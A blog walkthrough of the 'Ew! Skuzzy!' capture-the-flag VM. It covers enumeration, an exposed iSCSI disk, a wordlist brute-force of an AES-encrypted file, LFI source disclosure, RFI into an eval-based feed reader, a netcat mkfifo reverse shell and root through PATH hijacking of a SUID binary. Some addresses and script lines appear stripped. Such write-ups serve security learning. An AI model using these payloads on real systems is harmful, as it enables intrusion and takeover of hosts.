Infosec, CTF and more

Ew! Skuzzy! Solution

In this post I’m going to show you how to solve the Ew! Skuzzy! VM provided by vortex.

You can find the VM on this link

The goal of the VM is to gain root access to the machine and capture 5 flags.


I run a nmap scan to the victim, and this is what I get:

Nmap scan report for
Host is up (0.00017s latency).
Not shown: 65532 closed ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I visit the URL and this is what I get:

______            _____ __                         __
/ ____/      __   / ___// /____  __________  __  __/ /
/ __/ | | /| / /   \__ \/ //_/ / / /_  /_  / / / / / / 
/ /___ | |/ |/ /   ___/ / ,< / /_/ / / /_/ /_/ /_/ /_/  
/_____/ |__/|__/   /____/_/|_|\__,_/ /___/___/\__, (_)   
Welcome to 'Ew Skuzzy!' - my first CTF VM. 
Level: Intermediate.

Forgive the name... I heard a kid say it in a shopping centre; Or, perhaps it's a hint? Or am I trolling? ¯\_(ツ)_/¯ 

You'll just have to fireup dirbuster and find out! 

Flags will be found along the way, if you're on the right path. Most flag data is not of any signifigance to the challenge.

Hints available at /dev/null, or ping me on Twitter @vortexau (UTC+9.5 timezone, I'm probably sleeping while you're awake!).

Please let me know what you think of the challenge once you're done, and submit your walkthroughs to VulnHub, I'm really looking forward to reading them!

So, the machine invites me to run dirbuster, so I start it with big.txt wordlist to find out what is hidden. This wordlist discovers the following URL, but the page returns a HTTP error 403 Forbidden.

I look at the whole URL, the word smblogin doesn’t return anything interesting, but googling smblogin custom-log arquivos url returns me a link to the wordlist common_and_portuguese.txt from the SecList wordlists collection. So I run dirb again with this wordlist and I find the URL

I open the URL and I find an image of Lionel Richie that says Hello? Is it flags you're looking for. Nice, looks like he was quite young, but I have a look at the source code of the page and I find a comment:


It’s encoded in Base64, so I decode it and this is what I get:

$ cat comment_lionel.txt | base64 -d
cat comment_lionel.txt | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do
And I want to tell you so much, no flags for you...

Right, this is a modified version of the song “Hello” of Lionel Richie. Looks like a troll, but he talks about ports “open wide”, and there’s a port that I’ve checked, but nothing returns: port 3260. I check what service should be running on port 3260:

$ whatportis 3260
| Name         | Port | Protocol | Description |
| iscsi-target | 3260 |   tcp    | iSCSI port  |
| iscsi-target | 3260 |   udp    | iSCSI port  |

iSCSI Service, and looks like nmap kinda agrees:

$ nmap -sV -p 3260 -Pn -n -v

Scanning [1 port]
Discovered open port 3260/tcp on
Completed Connect Scan at 05:11, 0.00s elapsed (1 total ports)
Initiating Service scan at 05:11
Scanning 1 service on
Completed Service scan at 05:12, 93.59s elapsed (1 service on 1 host)
NSE: Script scanning
Initiating NSE at 05:12
Completed NSE at 05:12, 1.36s elapsed
Nmap scan report for
Host is up (0.00024s latency).
3260/tcp open  iscsi?

I have a look on Wikipedia about this service, and something gets my attention:

In computing, iSCSI (Listeni/aɪˈskʌzi/ eye-skuz-ee) is an acronym for Internet Small Computer Systems Interface

Did you see it? eye-skuz-ee, quite similar to the name of the VM…I might be on the right path.

So, I follow the guide on to connect to this system.

# iscsiadm --mode discovery --type sendtargets --portal,1 iqn.2017-02.local.skuzzy:storage.sys0

Always following the guide, I found the record id by the discovery, and now I need to login to mount the disk on my machine:

# iscsiadm --mode node --targetname iqn.2017-02.local.skuzzy:storage.sys0 --portal --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] successful.

# df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            9.6G     0  9.6G   0% /dev
tmpfs           2.0G   14M  2.0G   1% /run
/dev/sda1        95G   74G   17G  82% /
tmpfs           9.6G   34M  9.6G   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           9.6G     0  9.6G   0% /sys/fs/cgroup
cgmfs           100K     0  100K   0% /run/cgmanager/fs
tmpfs           2.0G   80K  2.0G   1% /run/user/1000
/dev/sdc        976M  1.8M  907M   1% /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e

Bingo, look at /dev/sdc, mounted on /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e, there’s the flag1.txt

# ls -lah /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e
total 556K
drwxr-xr-x  3 root root 4.0K Feb 28 08:56 .
drwxr-x---+ 5 root root 4.0K Mar 22 05:23 ..
-rw-r--r--  1 root root 100M Mar  5 09:00 bobsdisk.dsk
-rw-r--r--  1 root root  143 Feb 28 08:48 flag1.txt
drwx------  2 root root  16K Feb 28 08:39 lost+found

$ cat /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/flag1.txt
Congratulations! You've discovered the first flag!


Let's see how you go with the next one...

So, now there’s this file that looks like a disk, so I mount it to my computer and see the content:

# file /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk
/media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

# mkdir mount
mkdir mount

#mount ./bobsdisk.dsk mount/
mount ./bobsdisk.dsk mount/

# ls -la mount/
total 17
drwxr-xr-x 3 root    root     1024 Mar  5 09:00 .
drwxrwxrwx 1 anthony anthony   208 Mar 22 05:31 ..
drwx------ 2 root    root    12288 Feb 28 08:56 lost+found
-rw-r--r-- 1 root    root      288 Feb 28 09:25 ToAlice.csv.enc
-rw-r--r-- 1 root    root     2342 Mar  5 09:00 ToAlice.eml

An encrypted file and a message, and the second flag:

# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly.

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. 

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)



PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

Right, so I make some research about how to decrypt an encrypted file with openssl (check, and following the hints of the message I see that I need to add -md sha256 to decrypt, and the password must be in the rockyou.txt wordlist since it’s mentioned, so I come up with the following bash script:


PASSWORDS=$(cat "./rockyou.txt")

openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k $PASSWORD

if [ $RET -eq 0 ]; then
    echo "Candidate password: $PASSWORD"

With this script I find a bunch of false positives. I check online and find out that the AES/CBC can only determine if “decryption works” based on getting the padding right, so basically the file decrypts but is not recovered.

This means that, based on the bunch of passwords recovered, I need to make another script to check the file, and perhaps check the content everytime the file get decrypted.

After almost a day, I got over 5000 false positives from the rockyou.txt wordlist (over 14million passwords)…what to do then? Well, gotta run again another script to check the content of the file everytime the file gets decrypted. I wrote another script to do the same thing again (I know, I could’ve done this in first place, but it didn’t pop in my mind at the time) and I log everything into different files, and then I wait until the script finishes and I’ll grep for words mentioned in the email. The script is the following:


PASSWORDS=$(cat "./passphrases.txt")

openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k $PASSWORD

if [ $RET -eq 0 ]; then
    cat "Found password: $PASSWORD" >> found.log
    cat ToAlice.csv > "test/$PASSWORD.log"

And, finally (man, it was a pain), I find that the passphrase was “supercalifragilisticoespialidoso”

# grep -i "hacker" ./*
./supercalifragilisticoespialidoso.log:5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 

# cat ./supercalifragilisticoespialidoso.log
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Finally, got third flag.

Based on the hashes of the file, I visit the URL and I find a page with the following source code:

<title>Hackers! They're everywhere!</title>
<body bgcolor="black" text="#00ff00">
<marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! HACKER DETECTED! HACKER DETECTED!</font></marquee>
Yeah, I'm bringing Marquee back, suckers!
Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Geocities style though! 
<img src="hacker.jpg" />

I decode the Base64 hash and this is what I get:

# cat base64_hint.txt | base64 -d
cat base64_hint | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 

Another troll.

I then visit the URL and I find a web application called “My great web app”. I visit the URL but guess what? It’s another troll. I then visit the Feed Reader section which has a URL to load feeds: RFI doesn’t work, tried but I get the error Authentication invalid. You might need a key.. At this point I visit the URL called from the Feed section, and I find the following content:

This is some example source data for my nice little feed reader. I have designed my own nice little format which will allow it to include dynamic content. Who needs consultants when it's this easy? :) 

One of the best things is this will allow me to host my feed content to display on this page on an external server! So flexible :D

print("See? This is totally dynamic, generated by PHP right in my own little tool. Hacker proof, too, because there is a secret key required!");

Ok, basically the page parses the content of the data.txt and shows it in the page, using the keyword ##php## to run PHP code.

I visit the URL and I get the following output:

Now now.. We paid mega bucks to a big consultancy to mitigate skiddy tricks like that one! :trollface:

I instead try to visit and I get the following output:

<h1>My great web-app!</h1>

<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>


_____          _____                    |  |
|   __|_ _ _   |   __|___ _ _ ___ ___ _ _|  |
|   __| | | |  |__   |  _| | |- _|- _| | |__|
|_____|_____|  |_____|___|___|___|___|_  |__|

Intentionally Vulnerable VM! Do not expose to the Internet!

Developed By - vortex
twitter: @vortexau

Hints available at /dev/null (or ping me on Twitter)

Assigned IP:


<footer>Hack the Planet!</footer>

SWEET! Vulnerable to LFI.

I visit the URL, and the page renders the troll face again. I try using the php://filterfor Local File Inclusion to see the source code of the page, and this time I get the following output visiting

<h1>My great web-app!</h1>

<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>


Which decoded in base64 is the following:

$ cat flag_php_base64.txt | base64 -d
defined ('VIAINDEX') or die('Ooooh! So close..');
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
// Ok, ok. Here's your flag! 
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
// Well done, you're doing great so far!
// Next step. SHELL!
// Oh. That flag above? You're gonna need it... 

One more flag! Now I gotta get a shell.

The only page that could give me hope is /var/www/html/c2444910794e037ebd8aaf257178c90b/reader.php, so I visit the URL, copy the encode content in a file, decode it and this is what I find:

defined ('VIAINDEX') or die('Ooooh! So close..');
<h1>Feed Reader</h1>
if(isset($_GET['url'])) {
$url = $_GET['url'];
} else {
print("<a href=\"?p=reader&url=\">Load Feed</a>");

if(isset($url) && strlen($url) != '') {

// Setup some variables.
$secretok = false;
$keyneeded = true;

// Localhost as a source doesn't need to use the key.
if(preg_match("#^", $url)) {
    $keyneeded = false;
    $secretok = true;

// Handle the key validation when it's needed.
if($keyneeded) {
    $key = $_GET['key'];
    if(is_array($key)) {
        die("Array trick is mitigated ;)");
    if(isset($key) && strlen($key) == '47') {
    $hashedkey = hash('sha256', $key);
        $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

        // If you can use the following code for a timing attack
        // then good luck :) But.. You have the source anyway, right? :) 
    if(strcmp($hashedkey, $secret) == 0) {
            $secretok = true;
        } else {
            die("Sorry... Authentication failed. Key was invalid.");

    } else {
        die("Authentication invalid. You might need a key.");

// Just to make sure the above key check was passed.
if(!$secretok) {
    die("Something went wrong with the authentication process");

// Now load the contents of the file we are reading, and parse
// the super awesomeness of its contents!
$f = file_get_contents($url);

$text = preg_split("/##text##/s", $f);

if(isset($text['1']) && strlen($text['1']) > 0) {

print "<br /><br />";

$php = preg_split("/##php##/s", $f);

if(isset($php['1']) && strlen($php['1']) > 0) { 
    // "If Eval is the answer, you're asking the wrong question!" - SG
    // It hurts me to write insecure code like this, but it is in the
    // name of education, and FUN, so I'll let it slide this time.

So, we need to find a key to put in the key parameter in querystring for the reader.php in order to do a RFI.

After I while and various attempts, I understant that the key is flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} based on the message got from the flag.php file.

I setup the following data.txt reachable from with the following content:

Ok, all set, I visit the URL{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} multiple times in order to check which are the disabled PHP functions, create a data.txt with a reverse shell command and eventually get a reverse shell. There are no functions disabled that could deny me to run shell commands, so I do the following:

# cat data.txt 
# php -S
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 14:47:16 2017
Listening on
Document root is /ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:49:46 2017] [200]: /data.txt
# vim data.txt
# cat data.txt 
shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f');
# php -S
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 19:15:02 2017
Listening on
Document root is /media/anthony/Anthony PT External/ctf/ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:51:11 2017] [200]: /data.txt

And on the other terminal I get a reverse shell:

# nc -lnvp 4444
Listening on [] (family 0, port 4444)
Connection from [] port 4444 [tcp/*] accepted (family 2, sport 41612)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ hostname
$ /sbin/ifconfig
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:60:88:83  
        inet addr:  Bcast:  Mask:
        inet6 addr: fe80::a00:27ff:fe60:8883/64 Scope:Link
        RX packets:832540 errors:179 dropped:0 overruns:0 frame:0
        TX packets:807697 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1000 
        RX bytes:174883630 (174.8 MB)  TX bytes:508605160 (508.6 MB)
        Interrupt:19 Base address:0xd020 

lo        Link encap:Local Loopback  
        inet addr:  Mask:
        inet6 addr: ::1/128 Scope:Host
        UP LOOPBACK RUNNING  MTU:65536  Metric:1
        RX packets:278812 errors:0 dropped:0 overruns:0 frame:0
        TX packets:278812 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1 
        RX bytes:20637869 (20.6 MB)  TX bytes:20637869 (20.6 MB)

Perfect, I’m in.

I check the /etc/passwd file, and this is what I find:

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
skuzzy:x:1000:1000:skuzzy skuzbucket,,,:/home/skuzzy:/bin/bash

I wander around, and I find a bunch of files with the SUID set, in particular the file /opt/alicebackup:

www-data@skuzzy:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null

I run the file, and I see that the function id is run, and then a ssh connection is attempted:

www-data@skuzzy:/tmp$ cd /op	
cd /opt/
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ ./alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Temporary failure in name resolution
lost connection

At this point I copy a version of /bin/sh into the /tmp folder, export the /tmp folder into the Environment Path of Linux and run /opt/alicebackup, in order to execute a shell as root:

www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/opt$ clear
TERM environment variable not set.
www-data@skuzzy:/opt$ export TERM=linux
export TERM=linux
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/tmp$ cp /bin/sh id
cp /bin/sh id
www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@skuzzy:/tmp$ which id
which id
www-data@skuzzy:/tmp$ /opt/alicebackup
# whoami
# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
# cat flag.txt
cat flag.txt


You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email

Got root and the last flag!

Learnt some new things in here, especially the fact that I have patience bruteforcing sometimes :) the iSCSI (or eye-skuz-ee). I’ve also enjoyed the trolls of the author, very nice!

Thank you to vortex for the VM and Vulnhub for hosting it.